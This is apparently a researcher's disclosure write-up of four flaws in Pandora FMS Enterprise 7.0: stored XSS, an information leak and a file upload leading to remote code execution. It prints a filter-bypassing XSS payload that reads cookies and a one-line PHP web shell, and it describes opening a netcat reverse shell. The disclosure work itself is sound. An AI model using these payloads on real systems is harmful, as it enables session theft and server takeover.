Security Issue on Pandora FMS Enterprise

Version 7.0

Researching the platform, me and my coworker, Edward Amaral, security researcher from Stone Payments found some security issues on the network manager from Pandora.

Lets get all the security issues Explained:

- Agent form, Stored XSS

- Map editing, Stored XSS

- Information Leak

- RFI With RCE

First, Lets talk a bit about the application itself, we first got a license where we could test the application, we were very well supported by their team, which helped a lot to make the reports and test the application.

The first issue was a Stored XSS, which was kinda difficult to pull out. We tried different payloads, and it was all being remediated by the server. But we found that the application had some issues to remediate some types of payloads.

The Payload used to pull off that beautifull Pop-up with those Session IDs was: <script ~~~>alert(document.cookie)</script ~~~>

That’s a Relatively simple XSS script, which uses an exotic bypassing technique, with the “~” to deceive the server into thinking that’s not a HTML Tag.

The Cross-Site Scripting is the third most critical web application vulnerability according to OWASP which is the Open Web Application Security Project, an online community that produces a ton of free infosec quality content.

The second flaw was Another XSS, but this time, was creating a map. While creating a map, with a little test we found in a parameter, that it was vulnerable to the same payload used in the first issue.

So, Again, the payload used was <script ~~~>alert(document.cookie)</script ~~~>

For that one to Pop up on a real attack scenario, the victim need to click twice on the XSS poisoned map.

The Third Issue is a information Leak that can leak that the OS running the Server is UNIX based, and where the Web server is located in the machine.

This info is aquired in the main page of the application, when a graph is loading it sends the requisition containing the information, that can be intercepted using Burpsuite.

This information is passed via GET parameter, as we can see in the URL Below

URL:

[http://%3cip%3e/pandora_console/include/graphs/fgraph.php?homeurl=../../&graph_type=progressbar&width=120&homedir=/var/www/html/pandora_console&height=10&progress=100&mode=0&out_of_lim_str=Fora%20dos%20limites&title=&font=/var/www/html/pandora_console/include/fonts/smallfont.ttf&value_text=100%&colorRGB]http://<IP>/pandora_console/include/graphs/fgraph.php?homeurl=../../&graph_type=progressbar&width=120&homedir=/var/www/html/pandora_console&height=10&progress=100&mode=0&out_of_lim_str=Fora%20dos%20limites&title=&font=/var/www/html/pandora_console/include/fonts/smallfont.ttf&value_text=100%&colorRGB=

The Fourth Issue is a RFI

Remote File Inclusion is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:

· Code execution on the web server

· Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)

· Denial of Service (DoS)

· Sensitive Information Leakage

In our case, we upload a file to the server through the manager files function. This function is only for administrator’s users. We sent a simple php file that use a command to execute system commands. We used the code as quoted in the example below:

<?php. system($_GET[‘cmd’]); ?>

After that, we call a remote connection to a specific IP, with a reverse shell interaction using netcat, which resulted in a reverse shell on the server. That reverse Shellcode was created with MSFVenom.